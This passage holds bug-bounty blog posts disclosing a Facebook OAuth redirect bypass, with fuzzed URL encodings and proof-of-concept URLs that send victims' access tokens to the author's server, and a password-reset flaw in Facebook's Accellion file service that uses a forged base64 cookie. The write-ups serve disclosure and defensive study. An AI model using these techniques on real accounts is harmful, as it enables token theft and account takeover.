</div><div style="direction: ltr;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQKREAT99Z5fRZHWiJdkcSZsuyJlnSDNIADBJYGKZw6ny8yCEd4y28-ELc79UtS5f6vCPNFEEf9iN3d5hKvVU8tT5EycHyaCBbuPF9vWa0Mg3rJ2e5jorkl8plZ7_rrrNas99co0n52Ug/s1600/facebookdotcomdomainblockgeneralerror.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="157" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQKREAT99Z5fRZHWiJdkcSZsuyJlnSDNIADBJYGKZw6ny8yCEd4y28-ELc79UtS5f6vCPNFEEf9iN3d5hKvVU8tT5EycHyaCBbuPF9vWa0Mg3rJ2e5jorkl8plZ7_rrrNas99co0n52Ug/s320/facebookdotcomdomainblockgeneralerror.jpg" width="320" /></a></div><div style="direction: ltr;"></div><div style="direction: ltr;"></div><div style="direction: ltr;"><br />
<br />
<span style="font-family: arial,sans-serif; font-size: 13px;">I found that if you use a sub-domain for example: </span><a href="http://xxx.facebook.com/" style="font-family: arial,sans-serif; font-size: 13px;" target="_blank">xxx.facebook.com</a><span style="font-family: arial,sans-serif; font-size: 13px;">, Facebook will allow this action,</span></div><div style="direction: ltr;"></div><div style="direction: ltr;"></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">But if you try to access folders / files in </span><a href="http://xxx.facebook.com/" style="font-family: arial,sans-serif; font-size: 13px;" target="_blank">x.facebook.com (x.facebook.com/xx/x.php)</a><span style="font-family: arial,sans-serif; font-size: 13px;">, Facebook block you,</span></div><div style="direction: ltr;"></div><div style="direction: ltr;"></div><div class="separator" style="clear: both; text-align: center;"></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">So i notice that </span><a href="http://facebook.com/" style="font-family: arial,sans-serif; font-size: 13px;" target="_blank">facebook.com</a><span style="font-family: arial,sans-serif; font-size: 13px;"> use a Hash sign and ! in there URL (</span><a href="http://x.facebook.com/#%21/xxxx" style="font-family: arial,sans-serif; font-size: 13px;" target="_blank">x.facebook.com/#!/xxxx</a><span style="font-family: arial,sans-serif; font-size: 13px;">),</span></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">I tried to perform this action in the next parameter (next=</span><a href="http://x.facebook.com/%23%21/" style="font-family: arial,sans-serif; font-size: 13px;" target="_blank">x.facebook.com/%23!/</a><span style="font-family: arial,sans-serif; font-size: 13px;">), And Facebook blocked me again!,</span></div><div style="direction: ltr;"></div><span style="font-family: arial,sans-serif; font-size: 13px;">Then i tried to put "something" between the hash sign and the ! (%23x!), And Facebook didn't block this action,</span><br />
<div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;"></span><span style="font-family: arial,sans-serif; font-size: 13px;">Seems that there is a Reg-ex protection, Cool!,</span></div><div style="direction: ltr;"></div><div style="direction: ltr;"><br />
<span style="font-size: large;"><span style="font-family: arial,sans-serif;">But wait!,</span></span><br />
<br />
</div><div style="direction: ltr;"></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">If we put something like this (</span><a href="https://beta.facebook.com/#xxx%21/messages/" style="font-family: arial,sans-serif; font-size: 13px;" target="_blank">https://beta.facebook.com/#<wbr></wbr>xxx!/messages/</a><span style="font-family: arial,sans-serif; font-size: 13px;">), the action will not treat at is the same as #! in our client, and will not redirect us to the message screen,</span></div><div style="direction: ltr;"></div><div style="direction: ltr;"></div><div style="direction: ltr;"></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">I figured I had to find a way around it, so I started to fuzz characters between ! and # so I can make any browsers (IE,CHROME,Safari, Firefox..) treat it like #!,</span> <span style="font-family: arial,sans-serif; font-size: 13px;"> </span><br />
<span style="font-family: arial,sans-serif; font-size: 13px;"> </span></div><div style="direction: ltr;"></div><div style="direction: ltr;"><b><span style="font-family: arial,sans-serif; font-size: 13px;">Now it's time for fuzzing!,</span></b><br />
<span style="font-family: arial,sans-serif; font-size: 13px;"> </span><br />
<u><b><span style="font-family: arial,sans-serif; font-size: 13px;">Result:</span></b></u><br />
<span style="font-family: arial,sans-serif; font-size: 13px;"> </span><br />
<span style="font-family: arial,sans-serif; font-size: 13px;">%23~! (Works on all browsers)</span><span style="font-family: arial,sans-serif; font-size: 13px;"> </span></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">%23%09! (Works on all browsers)</span><br />
<span style="font-family: arial,sans-serif; font-size: 13px;"> </span><span style="font-family: arial,sans-serif; font-size: 13px;"> </span></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">Cool!, this trick works on </span><b><a href="http://touch.facebook.com/" style="font-family: arial,sans-serif; font-size: 13px;" target="_blank">touch.facebook.com/#%09!/</a><span style="font-family: arial,sans-serif; font-size: 13px;">,</span><a href="http://m.facebook.com/" style="font-family: arial,sans-serif; font-size: 13px;" target="_blank">m.<wbr></wbr>facebook.com/#~!/</a></b><span style="font-family: arial,sans-serif; font-size: 13px;">, <b>or any other Facebook mobile, touch domain)</b>,</span><br />
<span style="font-family: arial,sans-serif; font-size: 13px;"> </span> <span style="font-family: arial,sans-serif; font-size: 13px;"><br />
</span></div><div style="direction: ltr;"></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">So Now I'm able to redirect the victim to any Files / Directories in any Facebook Sub-domain</span><span style="font-family: arial,sans-serif; font-size: 13px;">,</span></div><div style="direction: ltr;"></div><div style="direction: ltr;"></div><div style="direction: ltr;"></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;"></span><span style="font-family: arial,sans-serif; font-size: 13px;">Then i created a Facebook application that will redirect the victim to external website for sending the access_token of the victim to my "malicious" external website,</span><span style="font-family: arial,sans-serif; font-size: 13px;"> </span></div><div style="direction: ltr;"></div><div style="direction: ltr;"><br />
<u><b><span style="font-family: arial,sans-serif; font-size: 13px;">For Example: (Zynga Texas Holdem OAuth Bypass):</span></b></u></div><div style="direction: ltr;"></div><div style="direction: ltr;"><br />
<a href="https://www.facebook.com/connect/uiserver.php?app_id=124024574287414&next=https%3A%2F%2Ftouch.facebook.com%2F%23%7E%21%2Fapps%2Ftestestestte%2F&display=page&fbconnect=1&method=permissions.request&response_type=token" style="font-family: arial,sans-serif; font-size: 13px;" target="_blank">https://www.facebook.com/<wbr></wbr>connect/uiserver.php?app_id=<wbr></wbr>2389801228&next=https%3A%<wbr></wbr>2F%2Ftouch.facebook.com%2F%23~<wbr></wbr>!%2Fapps%2Ftestestestte%2F&<wbr></wbr>display=page&fbconnect=1&<wbr></wbr>method=permissions.request&<wbr></wbr>response_type=token</a><br />
<br style="font-family: arial,sans-serif; font-size: 13px;" /> <span style="font-family: arial,sans-serif; font-size: 13px;">The next parameter will redirect to my Facebook application (touch.facebook.com/apps/testestestte),</span></div><div style="direction: ltr;"></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">And my Facebook application will redirect to </span><a href="http://files.nirgoldshlager.com/" style="font-family: arial,sans-serif; font-size: 13px;" target="_blank">files.nirgoldshlager.com</a><span style="font-family: arial,sans-serif; font-size: 13px;"> <wbr></wbr>domain and save the victim access_token in a log file (files.nirgoldshlager.com/log.txt),</span><br />
<br />
<span style="font-family: arial,sans-serif; font-size: 13px;">Amazing!, Now I'm able to steal access tokens of any Facebook application,</span><br />
<br style="font-family: arial,sans-serif; font-size: 13px;" /> <span style="font-size: x-large;"><b><span style="font-family: arial,sans-serif;">But wait!!!,</span> </b></span><br />
<br />
<br />
</div><div style="direction: ltr;"></div><div style="direction: ltr;"><span style="font-size: large;"><u><b>HERE COMES THE REAL DEAL: </b></u></span></div><div style="direction: ltr;"><br />
<span style="font-family: arial,sans-serif; font-size: 13px;">To make a successful attack, the victim need to use a Facebook application (Texas Holdem Poker, Diamond Dash, etc..),</span><br />
<span style="font-family: arial,sans-serif; font-size: 13px;">And these applications only have a basic permissions, We can always change the scope of the application permission and set a new permission but this method not powerful, Because the victim need to accept the new permissions of the app (<a href="https://www.facebook.com/connect/uiserver.php?app_id=2389801228&next=http://zynga.com&display=page&fbconnect=1&method=permissions.request&response_type=token&perms=ads_management%20create_event%20create_note%20email%20export_stream%20manage_friendlists%20manage_groups%20manage_notifications%20manage_pages%20offline_access%20photo_upload%20publish_actions%20publish_checkins%20publish_stream%20read_friendlists%20read_insights%20read_mailbox%20read_page_mailboxes%20read_requests%20read_stream%20rsvp_event%20share_item%20sms%20status_update%20video_upload%20xmpp_login">https://www.facebook.com/connect/uiserver.php?app_id=2389801228&next=http://zynga.com&display=page&fbconnect=1&method=permissions.request&response_type=token&perms=ads_management%20create_event%20create_note%20email%20export_stream%20manage_friendlists%20manage_groups%20manage_notifications%20manage_pages%20offline_access%20photo_upload%20publish_actions%20publish_checkins%20publish_stream%20read_friendlists%20read_insights%20read_mailbox%20read_page_mailboxes%20read_requests</a>),</span><br />
<br />
<br />
</div><div style="direction: ltr;"></div><div class="separator" style="clear: both; text-align: center;"></div><div style="direction: ltr;"></div><div style="direction: ltr;"></div><div style="direction: ltr;"></div><div style="direction: ltr;"></div><div style="direction: ltr;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjql4qXofb-K180xXXGLbtXZwcg3vAGEBBOm34jqsOEglhsY5YeCjGIhDEdcrG-vqwzgtGbpaaMwrIDmwddPkCsZWifkX5KbCQMRA_xVu3swj9X8kVs8QUc-jF1BoLhVMrySD5Pdy-Ue2o/s1600/allowthisaction.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjql4qXofb-K180xXXGLbtXZwcg3vAGEBBOm34jqsOEglhsY5YeCjGIhDEdcrG-vqwzgtGbpaaMwrIDmwddPkCsZWifkX5KbCQMRA_xVu3swj9X8kVs8QUc-jF1BoLhVMrySD5Pdy-Ue2o/s320/allowthisaction.jpg" width="320" /></a></div><br style="font-family: arial,sans-serif; font-size: 13px;" /></div><div style="direction: ltr;"></div><div style="direction: ltr;"><br />
<br />
<span style="font-size: x-large;"><b><span style="font-family: arial,sans-serif;">I wanted something more powerful!,</span></b></span><br />
<br />
</div><div style="direction: ltr;"></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">Something that will give me full permissions (read inbox, outbox, manage pages, manage ads,access to private photos, videos, etc.) on the victim's account without any installed application on the victim and make Facebook do the Goldshake ;),</span><br />
<br style="font-family: arial,sans-serif; font-size: 13px;" /> <span style="font-family: arial,sans-serif; font-size: 13px;">So i started thinking </span><br />
<span style="font-family: arial,sans-serif; font-size: 13px;">How this can be done?,</span></div><div style="direction: ltr;"></div><div style="direction: ltr;"></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">What if i will use a different app_id??</span><span style="font-family: arial,sans-serif; font-size: 13px;"> app_id of Facebook Messenger for Example,</span><br />
<span style="font-family: arial,sans-serif; font-size: 13px;">Does the user need to accept Facebook Messenger app in his Facebook account?,</span></div><br />
<span style="font-family: arial,sans-serif; font-size: 13px;"><b><span style="font-size: small;">The answer is no</span></b>,</span><br />
<span style="font-family: arial,sans-serif; font-size: 13px;">There are built-in Applications in Facebook that users never need to accept , And this application have a full control on your account,</span><br />
<span style="font-family: arial,sans-serif; font-size: 13px;">Also i found that this access_token never expired in Facebook messenger,</span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiXuRvLEbvOcgyC6uQ_sLkM-mDeF9fseZI_52ogLHofRiwNbiHSN8mQasfGyYH5WGm-66y4a-wHDJNSNAEeMPxbamTVdIAI7MVUBcIXhGH9A3HOZ__OcpOQxeAUscUpa2hsCrouMDbxuE/s1600/expiresscopes.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="151" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiXuRvLEbvOcgyC6uQ_sLkM-mDeF9fseZI_52ogLHofRiwNbiHSN8mQasfGyYH5WGm-66y4a-wHDJNSNAEeMPxbamTVdIAI7MVUBcIXhGH9A3HOZ__OcpOQxeAUscUpa2hsCrouMDbxuE/s320/expiresscopes.jpg" width="320" /></a></div><br />
<span style="font-family: arial,sans-serif; font-size: 13px;">Only after the victim change his password, Then the access_token will be expired, But why the hell the user would change his password?,</span><br />
<br />
<u><b><span style="font-family: arial,sans-serif; font-size: 13px;">PoC (Works on all browsers, No need for installed application on the victim account) :</span></b></u><br />
<br />
<a href="https://www.facebook.com/connect/uiserver.php?app_id=220764691281998&next=https%3A%2F%2Ftouch.facebook.com%2F%23%7E%21%2Fapps%2Ftestestestte%2F&display=page&fbconnect=1&method=permissions.request&response_type=token" style="font-family: arial,sans-serif; font-size: 13px;" target="_blank">https://www.facebook.com/<wbr></wbr>connect/uiserver.php?app_id=<wbr></wbr>220764691281998&next=https%3A%<wbr></wbr>2F%2Ftouch.facebook.com%2F%23~<wbr></wbr>!%2Fapps%2Ftestestestte%2F&<wbr></wbr>display=page&fbconnect=1&<wbr></wbr>method=permissions.request&<wbr></wbr>response_type=token</a><br />
<br />
<b>Facebook Security Fixed this bug</b> <br />
<br style="font-family: arial,sans-serif; font-size: 13px;" /> <u><b><span style="font-family: arial,sans-serif; font-size: 13px;">Full description of permission for Facebook messenger app:</span></b></u><br />
<br style="font-family: arial,sans-serif; font-size: 13px;" /> <span style="font-family: arial,sans-serif; font-size: 13px;">ads_management create_event create_note email export_stream manage_friendlists manage_groups manage_notifications manage_pages offline_access photo_upload publish_actions publish_checkins publish_stream read_friendlists read_insights read_mailbox read_page_mailboxes read_requests read_stream rsvp_event share_item sms status_update video_upload xmpp_login</span><br />
<br />
<b><span style="font-family: arial,sans-serif; font-size: 13px;">Works also on 2 step verification accounts, When it came to access_token , 2 Step verification will fail.</span></b><br />
<br />
<span style="font-family: arial,sans-serif; font-size: large;">And???,</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFlngGnC2OsjDHvro-f1qowsX-IkwlpvnQzhsC7zJ7mbA46I42qMlWmFLktcMV2YQrDa4JuzWrEHvG5ewrLYWXfHMr9AaHtquVxbjApBFLihlcusasphlBm0AN3Wvw2IpKkQX2O6u_LoM/s1600/Mario+game+Over.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFlngGnC2OsjDHvro-f1qowsX-IkwlpvnQzhsC7zJ7mbA46I42qMlWmFLktcMV2YQrDa4JuzWrEHvG5ewrLYWXfHMr9AaHtquVxbjApBFLihlcusasphlBm0AN3Wvw2IpKkQX2O6u_LoM/s320/Mario+game+Over.jpg" width="256" /></a></div><br />
<br />
<span style="font-size: large;"><u><b><span style="font-family: arial,sans-serif;">PoC Video:</span></b></u></span><br />
<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="281" mozallowfullscreen="" src="http://player.vimeo.com/video/60324292" webkitallowfullscreen="" width="500"></iframe> <br />
<a href="http://vimeo.com/60324292">How I Hacked Facebook OAuth To Get Full Permission On Any Facebook Account</a> from <a href="http://vimeo.com/user16651044">Nir</a> on <a href="http://vimeo.com/">Vimeo</a>.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><br />
</div><a href="https://vimeo.com/60324292"><br />
</a> <br />
Cya Next time!,<br />
<br />
<br />
Unknownnoreply@blogger.com20tag:blogger.com,1999:blog-1025468663370994513.post-42311923110663677152013-01-07T04:17:00.001-08:002013-04-04T22:04:01.522-07:00How I Hacked Facebook Employees Secure Files Transfer service (http://files.fb.com )<div dir="ltr" style="text-align: left;" trbidi="on"><br />
Hi,<br />
<br />
I want to share my finding regarding Password Reset logic flaw in Facebook Secure Files Transfer for Employees.<br />
<br />
Sometimes when you add a new security measure (Such as Secured File Transfer by Acellion), You may unintentionally expose your organization to these kind of risks<br />
<br />
First of all,<br />
<br />
If you look at https://files.fb.com, You can understand that this service belongs to Accellion (<a href="http://www.accellion.com/solutions/secure-file-transfer">http://www.accellion.com/solutions/secure-file-transfer</a>),<br />
<br />
Now to test a Password Reset logic flaw, We need an account to test for Reset Password Right?,<br />
<br />
It seems that Facebook was trying to avoid the creation of accounts in Accellion after removing the register form from the pageview,<br />
<br />
I discovered that if you know the direct location of the form (/courier/web/1000@/wmReg.html), You can easily bypass that protection and create an account in files.fb.com,<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRNaZqZgqQNhp_cZqhCTx65d0CrodFnVfd338VJf1k4BaOQ-3tBkVDTc9U_M9twnySIeLT7RWam2JBMGnmEGOCY-Jhnna8MmwasyzRFIgD2hJDUoScGNeRST9T4bgsddGPTPu-BeOUPH8/s1600/createaccount.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRNaZqZgqQNhp_cZqhCTx65d0CrodFnVfd338VJf1k4BaOQ-3tBkVDTc9U_M9twnySIeLT7RWam2JBMGnmEGOCY-Jhnna8MmwasyzRFIgD2hJDUoScGNeRST9T4bgsddGPTPu-BeOUPH8/s320/createaccount.jpg" width="320" /></a></div><br />
<br />
Now this vulnerability has been fixed and you can't open a new account in files.fb.com, Fixed:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuLsLzWonAzZC3yrjJBdsEbsyRl17K9DjMSEu6WfucrnKKrMzvrWN3Gzt7OuF4opcPA0LlCjNKTEPkGrvE8N_r_e1uVYvG8T7TjpuCD6RVsLA5HF6ypM1scoTIz7jOYvc6lXACWYwYYr8/s1600/create+account+fixed.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuLsLzWonAzZC3yrjJBdsEbsyRl17K9DjMSEu6WfucrnKKrMzvrWN3Gzt7OuF4opcPA0LlCjNKTEPkGrvE8N_r_e1uVYvG8T7TjpuCD6RVsLA5HF6ypM1scoTIz7jOYvc6lXACWYwYYr8/s320/create+account+fixed.jpg" width="320" /></a></div><br />
<br />
OK, So now we got a new account in files.fb.com Right?, Cool!,<br />
The next step was to download the 45 days trial of Accellion Secure File Sharing Service (<a href="http://www.accellion.com/trial-demo">http://www.accellion.com/trial-demo</a>), <br />
<br />
<br />
I realized that that there is two kinds of trial versions of Accellion,<br />
<br />
<b>1.</b> Free 45 Day Cloud Hosted Trial (5 users) <br />
<br />
<b>2.</b> Free 45 Day Virtual Trial (5 users) <br />
<br />
So I chose the VM(virtual) trial, Just for getting all the files and source code of this Accellion application,<br />
<br />
The "Bad News" was that the VM trial got a protection and you can't access to the files through the VM Version,<br />
<br />
Anyway you can bypass it by mounting the virtual drive in second linux machine ,<br />
This solution made it possible to get all the files names and folders in Accellion Secure File Transfer,<br />
<br />
Accellion encrypt their source files content (php) by using ionnCube PHP Encoder (<a href="http://www.ioncube.com/sa_encoder.php">http://www.ioncube.com/sa_encoder.php</a>).<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSWay0Nrn5cuNHO-WJtAm3e1jUhqmHFecwNoS_e172cLyd-BjAlX4WvjTSDe4WW5VbnSXt18oOwOX-nAIFG-XX1uQ9YsoekFRJCHlaFNCrb8Pefk73ZFaqL3EFaPT5OgLOtMGtmNy9WQ8/s1600/ioncube.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSWay0Nrn5cuNHO-WJtAm3e1jUhqmHFecwNoS_e172cLyd-BjAlX4WvjTSDe4WW5VbnSXt18oOwOX-nAIFG-XX1uQ9YsoekFRJCHlaFNCrb8Pefk73ZFaqL3EFaPT5OgLOtMGtmNy9WQ8/s320/ioncube.jpg" width="320" /></a></div><br />
<br />
In some older versions of Ioncube you can decrypt this "encrypted" files:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxAgCZA3odwuoRIiOJUTh2n9brJDxpHU_-bkW9RyqzWEMDg1lLagmz5vQ_yYdNt80wlP81yoccD1-7vLq0DRWfPZDgN-tniCYwPxpThfLqbv8tFQu5AmoPbskuz-g9_9npKaeFNcJT5To/s1600/EncryptSourceCodepassowrdupdateform.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxAgCZA3odwuoRIiOJUTh2n9brJDxpHU_-bkW9RyqzWEMDg1lLagmz5vQ_yYdNt80wlP81yoccD1-7vLq0DRWfPZDgN-tniCYwPxpThfLqbv8tFQu5AmoPbskuz-g9_9npKaeFNcJT5To/s320/EncryptSourceCodepassowrdupdateform.jpg" width="320" /></a></div><br />
<br />
Bad news again!, This Version of ionCube was not vulnerable to a possible decryption , I was disappointed because If I had the source I had the core.<br />
<br />
This could help me to find more cool issues such as: Command Execution, Local File Inclusion, etc..,<br />
<br />
Anyway i dropped this subject and keep my research on,<br />
<br />
I found this interesting file called wmPassupdate.html,<br />
<br />
This file used for a Password Recovery in Accellion Secure Files Transfer,<br />
<br />
I realized that there is another parameter in the Cookie when you are trying to recover your password in wmPassupdate.html,<br />
<br />
This parameter call referer, I found that the value of this parameter use Base64 encoding, Wtf?, I didn't think Base64 (for encryption) was still alive these days, Yes, It appears so :),<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn0fG6HuRSqq36Ru2NqUhQlNDS3Bs8urp0FQiyTs3vIpC9qA6Z_AsroTphBO58LbtUVcA3BiGAesJmBNhK83BZ947XShXDq9MYn-cXPCqKrahs0aTbvZ4qh9jaxyvrA3QC7ROyYOi-1wo/s1600/passwordreset+via+referer+base64,+email.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn0fG6HuRSqq36Ru2NqUhQlNDS3Bs8urp0FQiyTs3vIpC9qA6Z_AsroTphBO58LbtUVcA3BiGAesJmBNhK83BZ947XShXDq9MYn-cXPCqKrahs0aTbvZ4qh9jaxyvrA3QC7ROyYOi-1wo/s320/passwordreset+via+referer+base64,+email.jpg" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjn0fG6HuRSqq36Ru2NqUhQlNDS3Bs8urp0FQiyTs3vIpC9qA6Z_AsroTphBO58LbtUVcA3BiGAesJmBNhK83BZ947XShXDq9MYn-cXPCqKrahs0aTbvZ4qh9jaxyvrA3QC7ROyYOi-1wo/s1600/passwordreset+via+referer+base64%252C+email.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br />
</a></div><br />
<br />
So i decoded the base64 value, And so that the decoded data appeared to be my email address ("dbeckyxx@gmail.com"), Cool!, I started to delete all the "junk" cookies un-uneeded parameters and kept only the referer parameter,<br />
<br />
I encoded back to Base64 a different email of my test account in files.fb.com, And then copied it into the referer cookie parameter,<br />
<br />
Then i started to change the email address parameter in my POST request, to the victim email account and change the pass1,pass2, to my chosen password,<br />
<br />
<br />
And<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGtWlYC4qk_uaUHddpZZiigiveaO5BPUz2_UaCVbRiqQwK240VZYTrjVblVx3dUksz1td1Q-Ivd8fX4afBzWuD_mCMFk00bS2sf6syF-XXtAMq4J3fadjGbVtwryGkePRtPV5BKvXOjSQ/s1600/gameover-black.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGtWlYC4qk_uaUHddpZZiigiveaO5BPUz2_UaCVbRiqQwK240VZYTrjVblVx3dUksz1td1Q-Ivd8fX4afBzWuD_mCMFk00bS2sf6syF-XXtAMq4J3fadjGbVtwryGkePRtPV5BKvXOjSQ/s320/gameover-black.gif" width="320" /></a></div><br />
<br />
PoC Image:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXMasMz9ZRG_EogLwBjUPRodf2MHlq8s3yeR8_jGiWxcPKR_n2MsKYgTp9uwQsQpgeNl1CCAsL8O1KMCgC0R7t7o1_9ogslJaYaWHkAj7MobXnD3SsiFRaWmFyGXy623_E4g7Sk621_ko/s1600/passwordreset+via+referer+base64%252C+email.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXMasMz9ZRG_EogLwBjUPRodf2MHlq8s3yeR8_jGiWxcPKR_n2MsKYgTp9uwQsQpgeNl1CCAsL8O1KMCgC0R7t7o1_9ogslJaYaWHkAj7MobXnD3SsiFRaWmFyGXy623_E4g7Sk621_ko/s320/passwordreset+via+referer+base64%252C+email.jpg" width="320" /></a></div><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi29CqtTMVaWT_EbgtGXYOlJc07gtFMyuif2-9F8Rjsqeav_t7pygmd231tzQAa0fVVxXXvqSF7XbYjbjjNXpcl6s_qUNJ-EFjo1-NUz1JrqyNSDwM9qZZ1z3LBksBldDcmOOzX-AkpVHE/s1600/wmpassupdatefixed+by+adding+a+token.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br />
</a></div><br />
PoC Video:<br />
<div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/gFKPP5K1aVw?feature=player_embedded' frameborder='0'></iframe></div>Facebook, Accellion Fixed this issues, I also reported 20+ different bugs in Accellion Secure File Transfer Service, They fixed all of them :) Soon i will publish OAuth bypass in Facebook.com, Cya Next time!, </div>Unknownnoreply@blogger.com16tag:blogger.com,1999:blog-1025468663370994513.post-4003606896509398132013-01-03T04:10:00.004-08:002013-04-04T22:04:48.776-07:00Another Stored XSS in Facebook.com<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="rtl"><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">Another Stored XSS in Facebook.com, Another 3500$ Bounty</span></div><div style="direction: ltr;"><span style="font-family: arial, sans-serif;"><br />
</span></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">Hi,</span></div><span style="font-family: arial,sans-serif; font-size: 13px;"> </span><br />
<div style="direction: ltr;"><span style="font-family: arial, sans-serif;"><br />
</span></div><div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">I want to share my Stored XSS finding in <a href="http://facebook.com/" target="_blank">facebook.com</a>,</span></div><span style="font-family: arial,sans-serif; font-size: 13px;"> </span><br />
<div style="direction: ltr;"></div><span style="font-family: arial,sans-serif; font-size: 13px;"></span><br />
<div style="direction: ltr;"><span style="font-family: arial,sans-serif; font-size: 13px;">First of all, I must mention discovering Stored XSS issues in <a href="http://facebook.com/" target="_blank">facebook.com</a> is quite rare these days ,<span style="font-family: arial,sans-serif; font-size: 13px;"> </span></span><br />
<span style="font-family: arial,sans-serif; font-size: 13px;"><span style="font-family: arial,sans-serif; font-size: 13px;">For a start I would like to present some steps that I have made to make this Stored XSS Work,</span></span><br />
<span style="font-family: arial,sans-serif; font-size: 13px;"><span style="font-family: arial,sans-serif; font-size: 13px;">Currently, If you want to open a page (<a href="http://facebook.com/pages/create.php" target="_blank">facebook.com/pages/create.php</a><wbr></wbr>) with a malicious Page Name (Javascript Payload), You get blocked by automated system:</span></span></div><span style="font-family: arial,sans-serif; font-size: 13px;"> </span> <div style="direction: ltr;"></div><span style="font-family: arial,sans-serif; font-size: 13px;"> </span><br />
